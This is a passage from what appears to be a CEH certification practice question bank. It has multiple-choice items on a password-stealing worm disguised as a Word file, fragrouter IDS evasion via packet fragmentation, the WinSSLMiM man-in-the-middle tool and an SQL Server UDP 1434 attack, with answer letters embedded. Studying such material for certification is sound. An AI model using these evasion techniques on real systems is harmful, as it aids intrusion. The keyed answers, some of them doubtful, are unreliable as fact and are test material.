disguises itself as a Word document and uses a flaw in the Word program for its attack. ^ Once the file is opened, it can steal log files and passwords. These are then sent back to the originator of the attack. ^ What worm was used for this attack? (Select the Best Answer)^A. Melissa^B. Pretty Park^C. Goga^D. W32:Klez B#CEH Q.66 Which of the following correctly describes the IDS evasion tool fragrouter? (Select the Best Answer)^A. Some IDS can only keep track of one host/port connection at a time. Flood the target port with non-existent SYN packet first so that these IDS ignore the real connection.^B. IP Fragmentation. 
By sending out fragment packets out of order, some IDS assume the fragment packets arrive in order. They just reassemble the data as soon as the marked final fragment arrives. Sending out fragment packets out of order may fool the IDS.^C. Sending overlapping fragment packets. There may be a gap between the IDS and end-point server handling overlapping fragment. If the IDS does not handle overlapping fragments in a manner consistent with the systems it watches, it may reassemble a completely different packet than an end system in receipt of the same fragments.^D. An end-system can accept a packet that an IDS rejects. An IDS that mistakenly rejects such a packet misses its contents entirely. B#CEH Q.67 What is the hacking tool WinSSLMiM used for? (Select the Best Answer)^A. Kills SSL TCP Sessions.^B. Used in Man-in-the-Middle attacks against SSL Connections.^C. Generates fake SSL Certificates.^D. Monitors Windows SSL Sessions. A,B,C#CEH Q.68 The Microsoft SQL Server contains several serious vulnerabilities that allow remote attackers to obtain sensitive information, alter database content, compromise SQL servers, and, in some configurations, compromise server hosts. ^ The SQL Server Resolution Service operates on UDP port 1434 and provides a way for clients to query the appropriate network endpoints to use for a particular SQL Server instance. By sending a carefully crafted packet to the Resolution Service, an attacker could compromise and take over the system. ^ The hacking tool SQL2.EXE is used to launch this attack.^ C:\